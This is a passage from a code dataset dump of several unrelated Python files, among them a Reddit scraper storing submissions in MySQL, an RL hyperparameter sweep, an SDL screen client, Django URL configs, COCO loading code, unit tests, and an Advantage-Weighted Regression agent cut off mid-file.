start_date, end_date, new_tables, pwd_file, \n cmv_com_content, all_com_content, echo):\n \"\"\"\n Initializes the class with an instance of the praw.Reddit class.\n \"\"\"\n self.cmv_com_content = cmv_com_content\n self.all_com_content = all_com_content\n with open(pwd_file, 'r') as f:\n password = f.read()[:-1]\n\n # sqlalchemy connection\n self.engine = sqlalchemy.create_engine('mysql://jmcclellan:{}@mpcs53001.cs.uchicago.edu/jmcclellanDB?charset=utf8'.format(password), echo=echo)\n session = sessionmaker(bind=self.engine)\n self.session = session()\n if new_tables:\n CMVScraper.init_tables(self.engine)\n\n # PRAW objects\n self.praw_agent = praw.Reddit(\"cmv_scrape\", # Site ID\n user_agent = \"/u/shugamoe /r/changemyview scraper\")\n self.subreddit = self.praw_agent.subreddit(\"changemyview\")\n\n self.praw_agent.read_only = True # We\"re just here to look\n\n # Start and end_date dates of interest\n self.date_start_date = start_date\n self.date_end_date = end_date\n\n # If more than a day between start_date and end_date break up the date into\n # approximately day sized chunks to avoid 503 error.\n if end_date - start_date > 86400:\n self.date_chunks = np.ceil(np.linspace(start_date, end_date, num=\n (end_date - start_date) / 85400))\n\n # Example instances to to tinker with\n self.eg_submission = self.praw_agent.submission(\"5kgxsz\")\n self.eg_comment = self.praw_agent.comment(\"cr2jp5a\")\n self.eg_user = self.praw_agent.redditor(\"RocketCity1234\")\n\n def look_at_comment(self, com_id):\n \"\"\"\n \"\"\"\n return self.praw_agent.comment(com_id)\n\n def look_at_submission(self, sub_id):\n \"\"\"\n \"\"\"\n return self.praw_agent.submission(sub_id)\n\n @staticmethod\n def init_tables(engine):\n \"\"\"\n Create new tables in db\n \"\"\"\n init_tables(engine)\n\n @staticmethod\n def arg_parser():\n \"\"\"\n Handles arguments for CLI\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Scrape CMV Submissions and author information\")\n parser.add_argument(\"--start_date\", \"-s\", default=START_2016, type=int,\n help=\"Start Date (UTC Epoch) of CMV Submissions to gather\")\n parser.add_argument(\"--end_date\", \"-e\", default=JAN_4_2016, type=int,\n help=\"End Date (UTC Epoch) of CMV Submissions to gather\")\n parser.add_argument(\"--new_tables\", action=\"store_true\", default=False,\n help=\"Creates new tables in the database\")\n parser.add_argument(\"--pwd_file\", type=str, default=\"pwd.txt\",\n help=\"File containing the password\")\n parser.add_argument(\"--cmv_com_content\", type=bool, default=True,\n help=\"Gather the content of CMV Comments\")\n parser.add_argument(\"--all_com_content\", type=bool, default=False,\n help=\"Gather the content of All Comments\")\n parser.add_argument(\"--echo\", action=\"store_true\", default=False,\n help=\"Echo sqlalchemy engine\")\n\n parser_args = parser.parse_args()\n\n return parser_args\n\n @can_fail\n def scrape_submissions(self):\n \"\"\"\n This function gathers the submission IDs for submissions in\n /r/changemyview\n \"\"\"\n @can_fail\n def scrape_submissions_between(self, date_start_date, date_end_date):\n \"\"\"\n \"\"\"\n date_start_date_string = (\n time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime(date_start_date)))\n date_end_date_string = (\n time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime(date_end_date)))\n print(\"Gathering {} to {}\".format(date_start_date_string, date_end_date_string))\n\n for sub_instance in self.subreddit.submissions(date_start_date, date_end_date):\n GatherCMVSub(sub_instance, self).save_to_db()\n\n if hasattr(self, \"date_chunks\"):\n print(\"Time window too large, gathering submissions in chunks\")\n second_last_index = len(self.date_chunks) - 1\n for i in range(second_last_index):\n if i == 0:\n date_start_date = self.date_chunks[i]\n date_end_date = self.date_chunks[i + 1]\n else:\n date_start_date = self.date_chunks[i] + 1\n date_end_date = self.date_chunks[i + 1]\n scrape_submissions_between(self, date_start_date, date_end_date)\n # num_subs_gathered = len(self.cmv_subs)\n # print(\"{} submissions gathered\".format(num_subs_gathered))\n else:\n scrape_submissions_between(self, self.date_start_date, self.date_end_date)\n\n\n def scrape_author_histories(self):\n \"\"\"\n \"\"\"\n \n def scrape_author_history(author):\n \"\"\"\n \"\"\"\n print(\"Retrieving history for: {}\".format(author))\n SubAuthor = GatherCMVSubAuthor(author, self)\n SubAuthor.get_history_for(\"comments\")\n SubAuthor.get_history_for(\"submissions\")\n SubAuthor.save_to_db()\n\n get_auth_hist_vrized = np.vectorize(scrape_author_history,\n otypes=\"?\") # otypes kwarg to avoid double appplying func\n get_auth_hist_vrized(np.array([cmv_sub.author for cmv_sub in self.session.query(GatherCMVSub.sqla_mapping)]))\n\n\n @staticmethod\n def make_output_dir(dir_name):\n \"\"\"\n Creates an output directory in current folder if it does not exist\n already and returns the current directory\n \"\"\"\n cur_path = os.path.split(os.path.abspath(__file__))[0]\n output_fldr = dir_name\n output_dir = os.path.join(cur_path, output_fldr)\n if not os.access(output_dir, os.F_OK):\n os.makedirs(output_dir)\n\n return output_dir\n\n\ndef main():\n \"\"\"\n \"\"\"\n args = CMVScraper.arg_parser()\n print(args)\n global smodder \n smodder = CMVScraper(**vars(args))\n smodder.scrape_submissions()\n smodder.scrape_author_histories()\n\n\nif __name__ == \"__main__\":\n main()\n \n# SMODDER.update_cmv_submissions()\n# SMODDER.update_author_history()\n# with open(\"test.pkl\", \"wb\") as output:\n# pickle.dump(SMODDER, output)\n","sub_path":"a3/sql_file_production/scrape_cmv.py","file_name":"scrape_cmv.py","file_ext":"py","file_size_in_byte":7297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"166534331","text":"import os\nimport time\n\nt0 = time.time()\n\n\nfor batch_size in [10000, 30000, 50000]:\n for lr in [0.005, 0.01, 0.02]:\n os.system(f\"python cs285/scripts/run_hw2.py --env_name HalfCheetah-v2 --ep_len 150 \\\n--discount 0.95 -n 100 -l 3 -s 32 -b {batch_size} -lr {lr} -rtg --nn_baseline \\\n--exp_name q4_search_b{batch_size}_lr{lr}_rtg_nnbaseline\")\n\nt1 = time.time()\n\nprint(\"Total experiment time elapsed: \", t1 - t0)\n\n\n# python cs285/scripts/run_hw2.py --env_name InvertedPendulum-v2 \\\n# --ep_len 1000 --discount 0.9 -n 100 -l 2 -s 64 -b 500 -lr 0.1 -rtg \\\n# --exp_name q2_b500_r0.1","sub_path":"hw2/cs285/scripts/experiment4a.py","file_name":"experiment4a.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"175177876","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nfrom __future__ import print_function\n\nimport logging, argparse\nimport sys, socket\n\nimport ctypes\nfrom sdl2 import *\n\nfrom proto import handShake, initialize, updateScreen\nfrom util import read8, read16, read32\n\ndef parseArgs():\n parser = argparse.ArgumentParser(description='Secure Android client')\n parser.add_argument('--host', default='127.0.0.1')\n parser.add_argument('--port', default=6088, type=int)\n parser.add_argument('--log', default='WARNING')\n args = parser.parse_args()\n return args\n\ndef main():\n args = parseArgs()\n\n loglvl = getattr(logging, args.log.upper(), None)\n logging.basicConfig(level=loglvl)\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((args.host, args.port))\n\n # handshake and initialize\n handShake(s)\n width, height, name = initialize(s)\n logging.debug(\"{0}, {1}, {2}\".format(width, height, name))\n\n # create the window\n SDL_Init(SDL_INIT_VIDEO)\n window = SDL_CreateWindow(\"Client: {0}\".format(name).encode('utf8'),\n SDL_WINDOWPOS_CENTERED, SDL_WINDOWPOS_CENTERED,\n width, height, SDL_WINDOW_SHOWN)\n renderer = SDL_CreateRenderer(window, -1, SDL_RENDERER_ACCELERATED)\n texture = SDL_CreateTexture(renderer,\n SDL_PIXELFORMAT_RGB565,\n SDL_TEXTUREACCESS_STREAMING,\n width, height)\n\n running = True\n event = SDL_Event()\n while running:\n while SDL_PollEvent(ctypes.byref(event)) != 0:\n if event.type == SDL_QUIT:\n running = False\n print(\"quit\")\n break\n\n # get the type of current message\n t = read16(s)\n\n logging.debug(\"Type: {0}\".format(t))\n\n if t == 0:\n x = read16(s)\n y = read16(s)\n w = read16(s)\n h = read16(s)\n bpp = read16(s)\n\n rect = SDL_Rect()\n rect.x = x\n rect.y = y\n rect.w = w\n rect.h = h\n\n # update the texture using the received buffer\n buf = updateScreen(s, x, y, w, h, bpp)\n SDL_UpdateTexture(texture, rect, buf, w * bpp);\n\n # draw the texture\n SDL_RenderClear(renderer)\n SDL_RenderCopy(renderer, texture, None, None)\n SDL_RenderPresent(renderer)\n\n s.close()\n SDL_DestroyTexture(texture)\n SDL_DestroyRenderer(renderer)\n SDL_DestroyWindow(window)\n SDL_Quit()\n\n return 0\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"SDL-work/client/scclient.py","file_name":"scclient.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"590550196","text":"# -*- coding: utf-8 -*-\n#funding中investors未关联的内容,如果能匹配到投资机构的工商注册名称,则替换短名,并记录funding_investor_rel\n#注意一个机构多个基金投资的情况,要去重\n\nimport os, sys\nimport json, time\n\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../util'))\nimport loghelper, db\n\n#logger\nloghelper.init_logger(\"funding_investor_structuring\", stream=True)\nlogger = loghelper.get_logger(\"funding_investor_structuring\")\n\n\ndef process():\n id = -1\n conn = db.connect_torndb()\n fullnames = conn.query(\"select a.investorId,a.name,i.website,i.name as shortname from investor_alias a \"\n \" join investor i on a.investorId=i.id\"\n \" where a.type=12010 \"\n \" and (a.active is null or a.active='Y')\"\n \" and (i.active is null or i.active='Y')\"\n \" and a.verify='Y'\")\n while True:\n fs = conn.query(\"select * from funding where id>%s order by id limit 1000\", id)\n if len(fs) == 0:\n break\n for f in fs:\n funding_id = f[\"id\"]\n if funding_id > id:\n id = funding_id\n str_investors = f[\"investors\"]\n if str_investors is None or str_investors == \"\":\n continue\n logger.info(str_investors)\n investors = json.loads(str_investors.replace(\"\\n\",\",\"))\n\n _investors = []\n flag = False\n for s in investors:\n if s[\"type\"] == \"text\":\n text = s[\"text\"]\n if len(text) < 4:\n _investors.append(s)\n continue\n if contain_company_name(text) is False:\n _investors.append(s)\n continue\n names = find_all_investor_fullnames(fullnames, text)\n if len(names) > 0:\n #logger.info(text)\n #logger.info(names)\n result = structure(text, names)\n result = remove_dup(result)\n #logger.info(result)\n #logger.info(\"\")\n _investors.extend(result)\n flag = True\n else:\n _investors.append(s)\n else:\n _investors.append(s)\n\n if flag:\n logger.info(str_investors)\n _str_investors =json.dumps(_investors, ensure_ascii=False)\n logger.info(_str_investors)\n _str_raw_investors = gen_raw_str(_investors)\n logger.info(_str_raw_investors)\n logger.info(\"\")\n corp = conn.get(\"select * from company where id=%s\",f[\"companyId\"])\n logger.info(\"companyId: %s, companyName: %s\", corp[\"id\"], corp[\"name\"])\n conn.execute(\"set autocommit=0\")\n for inv in _investors:\n if inv[\"type\"] == \"investor\":\n rel = conn.get(\"select * from funding_investor_rel\"\n \" where (active is null or active='Y')\"\n \" and fundingId=%s and investorId=%s\",\n funding_id, inv[\"id\"])\n if rel is None:\n logger.info(\"insert rel: %s\", inv[\"text\"])\n conn.insert(\"insert funding_investor_rel(fundingId,investorId,createUser,verify,active,createTime) values(%s,%s,139,'Y','Y',now())\",\n funding_id, inv[\"id\"])\n conn.update(\"update funding set investorsRaw=%s, investors=%s where id=%s\",\n _str_raw_investors, _str_investors, funding_id)\n conn.execute(\"commit\")\n # exit()\n\n conn.close()\n\n\ndef gen_raw_str(result):\n str = \"\"\n for item in result:\n str += item[\"text\"]\n return str\n\n\ndef remove_dup(result):\n _result = []\n investorids = {}\n for item in result:\n if item[\"type\"] == \"text\":\n _result.append(item)\n else:\n if not investorids.has_key(item[\"id\"]):\n investorids[item[\"id\"]] = 1\n _result.append(item)\n last = _result[-1]\n if last[\"type\"] == \"text\" and (last[\"text\"].strip()==\"\" or\n last[\"text\"].strip()==\",\" or\n last[\"text\"].strip()==\",\" or\n last[\"text\"].strip() == \"、\"\n ):\n _result.pop(-1)\n return _result\n\n\ndef find_first_one(text, names):\n index = 65536\n first = None\n for name in names:\n i = text.find(name[\"name\"])\n if i>=0 and i<index:\n index = i\n first = name\n return first, index\n\n\ndef structure(text, names):\n results = []\n\n name, index = find_first_one(text, names)\n if name is None:\n if text.strip() != \"\":\n results.append({\n \"type\":\"text\",\n \"text\":text\n })\n return results\n\n if index > 0:\n results.append({\n \"type\": \"text\",\n \"text\": text[:index]\n })\n results.append({\n \"type\": \"investor\",\n \"text\": name[\"shortname\"],\n \"id\": name[\"investorId\"],\n \"link\": name[\"website\"],\n })\n text = text[(index+len(name[\"name\"])):]\n results.extend(structure(text,names))\n return results\n\ndef contain_company_name(text):\n if u\"公司\" in text or u\"合伙\" in text or u\"基金\" in text:\n return True\n return False\n\n\ndef find_all_investor_fullnames(fullnames, text):\n names = []\n while True:\n f = find_investor_fullname(fullnames, text)\n if f is None:\n break\n else:\n names.append(f)\n text = text.replace(f[\"name\"], \"\")\n return names\n\n\ndef find_investor_fullname(fullnames, text):\n for f in fullnames:\n if f[\"name\"] in text:\n return f\n return None\n\n\nif __name__ == \"__main__\":\n while True:\n logger.info(\"Start...\")\n process()\n logger.info(\"End.\")\n time.sleep(10*60)","sub_path":"data/patch/funding_investor_structuring.py","file_name":"funding_investor_structuring.py","file_ext":"py","file_size_in_byte":6451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"25951064","text":"# Tool binds\nbindk(key.paragraph, toggle_selection_type)\nbindc('1', tool_pen )\nbindc('2', tool_brush )\nbindc('3', tool_picker )\nbindc('4', tool_line )\nbindc('5', tool_spline )\nbindc('6', tool_rectangle)\nbindc('7', tool_ellipse )\nbindc('8', tool_polygon )\nbindc('9', tool_text )\nbindc('0', tool_fill )\n\n# Layer choice\nbindc('q', raster_layer )\nbindc('w', object_layer )\n\n# Convenient zoom\nbindc('a', zoom_in )\nbindc('z', zoom_out )\n\n# Misc\nbindk(key.space, select_top_object)\nbindc( 's', swap_colors)\nbindc( 'c', center_on_cursor )\nbindc( 'c', center_on_selected, mod.alt )\nbindc( 'x', pick_color_fg )\nbindc( 'i', context_flip_horizontal )\nbindc( 'j', context_flip_vertical )\nbindc( 'k', context_rotate_90CW )\n\ndef explorer_active_file():\n import subprocess\n filename = get_active_image().get_filename()\n if filename is not None:\n subprocess.Popen(r'explorer /select,\"%s\"' % get_active_image().get_filename())\nbindc('e', explorer_active_file )\n","sub_path":"tags/release-0.6/python/py/default_ini.py","file_name":"default_ini.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"146909569","text":"from django.urls import path\nfrom . import views\nfrom django.conf.urls import url\n\nurlpatterns = [\n path('',views.index),\n path('maths1',views.maths1),\n path('tc',views.tc),\n path('phy',views.phy),\n path('c',views.c),\n path('fit',views.fit),\n url(r'^activate/(?P<uidb64>[0-9A-Za-z_\\-]+)/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',\n views.activate, name='activate'),\n path('signup',views.signup),\n path('login',views.login_view),\n path('logout',views.logout_view),\n path('upload',views.add_notes)\n]","sub_path":"notes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"365496808","text":"from django.conf.urls import url\nfrom portal import views\n\napp_name = 'portal'\nurlpatterns = [\n url(r'^$', views.index, name=\"index\"),\n url(r'^category/(?P<category_slug>[\\w\\-]+)/add_page/$', views.add_page, name=\"add_page\"),\n url(r'^category/(?P<category_slug>[\\w\\-]+)/$', views.detail, name=\"detail\"),\n url(r'^category/(?P<category_slug>[\\w\\-]+)/(?P<page_slug>[\\w\\-]+)/$', views.page_redirect, name=\"page_redirect\"),\n url(r'^add_category/$', views.add_category, name=\"add_category\"),\n url(r'^playground/$', views.playground, name=\"playground\"),\n]","sub_path":"portal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"603027553","text":"import unittest\n\nimport find_my_cat\n\nimport mock\n\nfrom copy import deepcopy\n\n\nclass TestCatFinder(unittest.TestCase):\n def setUp(self):\n self.missing = 5\n self.connections, self.stations = find_my_cat.prepare_map_data()\n self.cf = find_my_cat.CatFinder(self.connections, self.stations, missing=self.missing)\n\n def test_prepare_map_data(self):\n \"\"\"\n Checking if data is being processed properly\n \"\"\"\n self.assertIsInstance(self.stations, dict)\n self.assertIsInstance(self.connections, dict)\n self.assertDictContainsSubset({'9': {'name': 'Arnos Grove', 'open': True}}, self.stations)\n self.assertItemsEqual(['212', '28', '83', '249', '94', '104', '163'], self.connections['11'])\n for k, v in self.connections.iteritems():\n self.assertNotIn(k, v)\n\n def test_cat_finder(self):\n \"\"\"\n Checking if CatFinder object is initialised as expected\n \"\"\"\n self.assertIsInstance(self.cf._lost_cats, dict)\n self.assertTrue(all((isinstance(e, basestring) for e in self.cf._lost_cats.values())))\n self.assertIsInstance(self.cf._owners_looking, dict)\n self.assertTrue(all((isinstance(e, list) for e in self.cf._owners_looking.values())))\n self.assertEqual(len(self.cf._lost_cats), self.missing)\n self.assertEqual(len(self.cf._owners_looking), self.missing)\n\n def test_cats_move(self):\n \"\"\"\n Checking if cats move unless they are on station with no connections\n \"\"\"\n cats_before = deepcopy(self.cf._lost_cats)\n self.cf._cats_move()\n for k, v in cats_before.iteritems():\n self.assertTrue(v != self.cf._lost_cats[k] or v not in self.cf._connections)\n\n def test_cats_not_move(self):\n \"\"\"\n Checking if cats do not move if they are on station with no connections\n \"\"\"\n self.cf._connections = {'1': []}\n self.cf._lost_cats = {'0': '1'}\n cats_before = deepcopy(self.cf._lost_cats)\n self.cf._cats_move()\n self.assertDictEqual(cats_before, self.cf._lost_cats)\n\n @mock.patch('random.choice')\n def test_cats_not_move_to_closed(self, random_choice):\n \"\"\"\n Checking if cats do not travel to closed stations\n \"\"\"\n self.cf._lost_cats = {'0': '1'}\n self.cf._connections = {'1': ['2', '3']}\n self.cf._stations = {'2': {'name': 'Black Cat', 'open': False},\n '3': {'name': 'White Cat', 'open': True}}\n self.cf._cats_move()\n random_choice.assert_called_with(['3'])\n\n def test_owners_move(self):\n \"\"\"\n Checking if owners move unless they are on station with no connections\n \"\"\"\n owners_before = deepcopy(self.cf._owners_looking)\n self.cf._owners_move()\n for k, v in owners_before.iteritems():\n self.assertTrue(v != self.cf._owners_looking[k] or not self.cf._connections[v[-1]])\n\n def test_owners_prefer_not_visited(self):\n \"\"\"\n Checking if owners travel rather to a station not visited before\n \"\"\"\n self.cf._connections = {'1': ['2', '5']}\n self.cf._owners_looking = {'0': ['2', '1']}\n owners_before = deepcopy(self.cf._owners_looking)\n self.cf._owners_move()\n for k, v in owners_before.iteritems():\n self.assertTrue(v != self.cf._owners_looking[k] or not self.cf._connections[v[-1]])\n\n def test_owners_not_move(self):\n \"\"\"\n Checking if owners do not move if they are on station with no connections\n \"\"\"\n self.cf._connections = {'1': []}\n self.cf._owners_looking = {'0': ['1']}\n owners_before = deepcopy(self.cf._owners_looking)\n self.cf._owners_move()\n self.assertDictEqual(owners_before, self.cf._owners_looking)\n\n def test_find_cats(self):\n \"\"\"\n Test finding cats\n \"\"\"\n station_found = '1'\n ls = {'0': station_found}\n self.cf._lost_cats = ls.copy()\n ol = {'0': ['2', station_found]}\n self.cf._owners_looking = ol.copy()\n self.assertTrue(self.cf._stations[station_found]['open'])\n self.cf._find_cats()\n self.assertEqual(self.cf._lost_cats, {})\n self.assertEqual(self.cf._owners_looking, {})\n self.assertEqual(self.cf._found_cats, ls)\n self.assertEqual(self.cf._owners_found, ol)\n self.assertFalse(self.cf._stations[station_found]['open'])\n\n def test_look_for_cats(self):\n \"\"\"\n Test main function running big search for cats\n \"\"\"\n cf = find_my_cat.CatFinder(self.connections, self.stations, missing=100)\n cf.look_for_cats()\n\n def test_calc_averages(self):\n \"\"\"\n Test calculating averages\n \"\"\"\n self.cf._owners_found = {}\n self.cf._owners_looking = {}\n self.assertTupleEqual(self.cf._calc_averages(), ('-', '-'))\n self.cf._owners_found = {0: range(5), 1: range(10)}\n self.cf._owners_looking = {0: range(4), 1: range(1)}\n self.assertTupleEqual(self.cf._calc_averages(), (5, 7.5))\n\n def test_get_trapped_numbers(self):\n \"\"\"\n Test getting numbers of trapped cats and owners\n \"\"\"\n self.cf._lost_cats = {'0': '1', '1': '1', '2': '2'}\n self.cf._owners_looking = {'0': ['2', '1'], '1': ['1', '2']}\n self.cf._connections = {'2': []}\n self.assertTupleEqual(self.cf._get_trapped_numbers(), (2, 1))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"unittests/test_find_my_cat.py","file_name":"test_find_my_cat.py","file_ext":"py","file_size_in_byte":5509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"634686313","text":"from django.conf.urls import patterns, include, url\nfrom Indigo7.views import GridView, get_grid_data, \\\n get_grid_config\nfrom DHS.views import document_return_file\n\nurlpatterns = patterns('DHS.views', \n\n\n url(r'^$',\n GridView.as_view( \n template_name='DHS/list_grid.html',\n gridname='document_grid',\n gridurl='document_grid'), \n name='document_list'), \n \n url(r'^document_grid/$', \n get_grid_data, ({'module' :'DHS', 'objectname': 'DocumentGrid', \n 'gridurl': 'document_grid'}), \n name='document_grid'),\n \n url(r'^document_grid/cfg/$', \n get_grid_config, ({'module' :'DHS', 'objectname': 'DocumentGrid',\n 'gridurl': 'document_grid'}), \n name='document_grid_config'), \n \n url(r'get_document/(?P<document_id>\\d+)$', document_return_file, name='get_document'), \n \n)","sub_path":"DHS/urlconf/documents.py","file_name":"documents.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"250684521","text":"from pycocotools.coco import COCO\nimport numpy as np\nimport skimage.io as io\nimport matplotlib.pyplot as plt\nimport pylab\n\npylab.rcParams['figure.figsize'] = (10.0, 8.0)\ndataDir='/home/iftimie/PycharmProjects/Human-Body-Part-Detector/datasets/coco'\ndataType='train2014'\nannFile='%s/annotations/instances_%s.json'%(dataDir,dataType)\ncoco=COCO(annFile)\n#\n# cats = coco.loadCats(coco.getCatIds())\n# nms=[cat['name'] for cat in cats]\n# print ('COCO categories: \\n\\n', ' '.join(nms))\n#\n# nms = set([cat['supercategory'] for cat in cats])\n# print ('COCO supercategories: \\n', ' '.join(nms))\n#\ncatIds = coco.getCatIds(catNms=['person','dog','skateboard']);\nimgIds = coco.getImgIds(catIds=catIds );\nimg = coco.loadImgs(imgIds[np.random.randint(0,len(imgIds))])[0]\n#\nI = io.imread('http://mscoco.org/images/%d'%(img['id']))\n# plt.figure(); plt.axis('off')\n# plt.imshow(I)\n# plt.show()\n#\n# plt.imshow(I); plt.axis('off')\n# annIds = coco.getAnnIds(imgIds=img['id'], catIds=catIds, iscrowd=None)\n# anns = coco.loadAnns(annIds)\n# coco.showAnns(anns)\n\nannFile = '%s/annotations/person_keypoints_%s.json'%(dataDir,dataType)\ncoco_kps=COCO(annFile)\n\nplt.imshow(I); plt.axis('off')\nax = plt.gca()\nannIds = coco_kps.getAnnIds(imgIds=img['id'], catIds=catIds, iscrowd=None)\nanns = coco_kps.loadAnns(annIds)\ncoco_kps.showAnns(anns)\n\nannFile = '%s/annotations/captions_%s.json'%(dataDir,dataType)\ncoco_caps=COCO(annFile)\n\nannIds = coco_caps.getAnnIds(imgIds=img['id']);\nanns = coco_caps.loadAnns(annIds)\ncoco_caps.showAnns(anns)\nplt.imshow(I); plt.axis('off')\nplt.show()","sub_path":"pyproject/loadImages.py","file_name":"loadImages.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"22076985","text":"import gym\nimport numpy as np\nimport tensorflow as tf\n\nimport learning.rl_agent as rl_agent\nimport util.net_util as net_util\nimport util.rl_path as rl_path\n\n'''\nAdvantage-Weighted Regression Agent\n'''\n\nclass AWRAgent(rl_agent.RLAgent):\n ADV_EPS = 1e-5\n\n def __init__(self, \n env,\n sess,\n\n actor_net_layers=[128, 64],\n actor_stepsize=0.00005,\n actor_momentum=0.9,\n actor_init_output_scale=0.01,\n actor_batch_size=256,\n actor_steps=1000,\n action_std=0.2,\n action_l2_weight=0.0,\n action_entropy_weight=0.0,\n\n critic_net_layers=[128, 64],\n critic_stepsize=0.01,\n critic_momentum=0.9,\n critic_batch_size=256,\n critic_steps=500,\n\n discount=0.99,\n samples_per_iter=2048,\n replay_buffer_size=50000,\n normalizer_samples=300000,\n\n weight_clip=20,\n td_lambda=0.95,\n temp=1.0,\n\n visualize=False):\n \n self._actor_net_layers = actor_net_layers\n self._actor_stepsize = actor_stepsize\n self._actor_momentum = actor_momentum\n self._actor_init_output_scale = actor_init_output_scale\n self._actor_batch_size = actor_batch_size\n self._actor_steps = actor_steps\n self._action_std = action_std\n self._action_l2_weight = action_l2_weight\n self._action_entropy_weight = action_entropy_weight\n\n self._critic_net_layers = critic_net_layers\n self._critic_stepsize = critic_stepsize\n self._critic_momentum = critic_momentum\n self._critic_batch_size = critic_batch_size\n self._critic_steps = critic_steps\n\n self._weight_clip = weight_clip\n self._td_lambda = td_lambda\n self._temp = temp\n \n self._critic_step_count = 0\n self._actor_steps_count = 0\n\n self._actor_bound_loss_weight = 10.0\n\n super().__init__(env=env,\n sess=sess,\n discount=discount,\n samples_per_iter=samples_per_iter,\n replay_buffer_size=replay_buffer_size,\n normalizer_samples=normalizer_samples,\n visualize=visualize)\n return\n\n def sample_action(self, s, test):\n n = len(s.shape)\n s = np.reshape(s, [-1, self.get_state_size()])\n\n feed = {\n self._s_tf : s\n }\n\n if (test):\n run_tfs = [self._mode_a_tf, self._mode_a_logp_tf]\n else:\n run_tfs = [self._sample_a_tf, self._sample_a_logp_tf]\n\n a, logp = self._sess.run(run_tfs, feed_dict=feed)\n\n if n == 1:\n a = a[0]\n logp = logp[0]\n return a, logp\n\n def eval_critic(self, s):\n n = len(s.shape)\n s = np.reshape(s, [-1, self.get_state_size()])\n\n feed = {\n self._s_tf : s\n }\n v = self._sess.run(self._critic_tf, feed_dict=feed)\n\n if n == 1:\n v = v[0]\n return v\n\n def train(self, max_iter, test_episodes, output_dir, output_iters):\n self._critic_step_count = 0\n self._actor_step_count = 0\n super().train(max_iter=max_iter, \n test_episodes=test_episodes,\n output_dir=output_dir, \n output_iters=output_iters)\n return\n\n def _build_nets(self):\n s_size = self.get_state_size()\n a_size = self.get_action_size()\n action_space = self.get_action_space()\n\n self._s_tf = tf.placeholder(tf.float32, shape=[None, s_size], name=\"s\")\n self._a_tf = tf.placeholder(tf.float32, shape=[None, a_size], name=\"a\")\n self._tar_val_tf = tf.placeholder(tf.float32, shape=[None], name=\"tar_val\")\n self._a_w_tf = tf.placeholder(tf.float32, shape=[None], name=\"a_w\")\n\n with tf.variable_scope(self.MAIN_SCOPE):\n with tf.variable_scope(self.ACTOR_SCOPE):\n self._norm_a_pd_tf = self._build_net_actor(self._get_actor_inputs())\n\n with tf.variable_scope(self.CRITIC_SCOPE):\n self._norm_critic_tf = self._build_net_critic(self._get_critic_inputs())\n self._critic_tf = self._val_norm.unnormalize_tf(self._norm_critic_tf)\n \n sample_norm_a_tf = self._norm_a_pd_tf.sample()\n self._sample_a_logp_tf = self._norm_a_pd_tf.log_prob(sample_norm_a_tf)\n self._sample_a_tf = self._a_norm.unnormalize_tf(tf.cast(sample_norm_a_tf, tf.float32))\n if (len(self._sample_a_tf.shape) == 1):\n self._sample_a_tf = tf.expand_dims(self._sample_a_tf, axis=-1)\n\n mode_norm_a_tf = self._norm_a_pd_tf.mode()\n self._mode_a_logp_tf = self._norm_a_pd_tf.log_prob(mode_norm_a_tf)\n self._mode_a_tf = self._a_norm.unnormalize_tf(tf.cast(mode_norm_a_tf, tf.float32))\n if (len(self._mode_a_tf.shape) == 1):\n self._mode_a_tf = tf.expand_dims(self._mode_a_tf, axis=-1)\n\n norm_a_tf = self._a_norm.normalize_tf(self._a_tf)\n if (isinstance(action_space, gym.spaces.Discrete)):\n norm_a_tf = tf.squeeze(norm_a_tf, axis=-1)\n norm_a_tf = tf.cast(norm_a_tf, tf.int32)\n self._a_logp_tf = self._norm_a_pd_tf.log_prob(norm_a_tf)\n return\n\n def _build_losses(self):\n norm_tar_val_tf = self._val_norm.normalize_tf(self._tar_val_tf)\n norm_val_diff = norm_tar_val_tf - self._norm_critic_tf\n self._critic_loss_tf = 0.5 * tf.reduce_mean(tf.square(norm_val_diff))\n\n self._actor_loss_tf = self._a_w_tf * self._a_logp_tf\n self._actor_loss_tf = -tf.reduce_mean(self._actor_loss_tf)\n\n self._actor_loss_tf += self._actor_bound_loss_weight * self._action_bound_loss(self._norm_a_pd_tf)\n\n if (self._action_l2_weight != 0):\n self._actor_loss_tf += self._action_l2_weight * self._action_l2_loss(self._norm_a_pd_tf)\n\n if (self._action_entropy_weight != 0):\n self._actor_loss_tf += self._action_entropy_weight * self._action_entropy_loss(self._norm_a_pd_tf)\n\n return\n\n def _build_solvers(self):\n critic_vars = self._tf_vars(self.MAIN_SCOPE + \"/\" + self.CRITIC_SCOPE)\n self._critic_opt = tf.train.MomentumOptimizer(learning_rate=self._critic_stepsize, momentum=self._critic_momentum)\n self._update_critic_op = self._critic_opt.minimize(self._critic_loss_tf, var_list=critic_vars)\n\n actor_vars = self._tf_vars(self.MAIN_SCOPE + \"/\" + 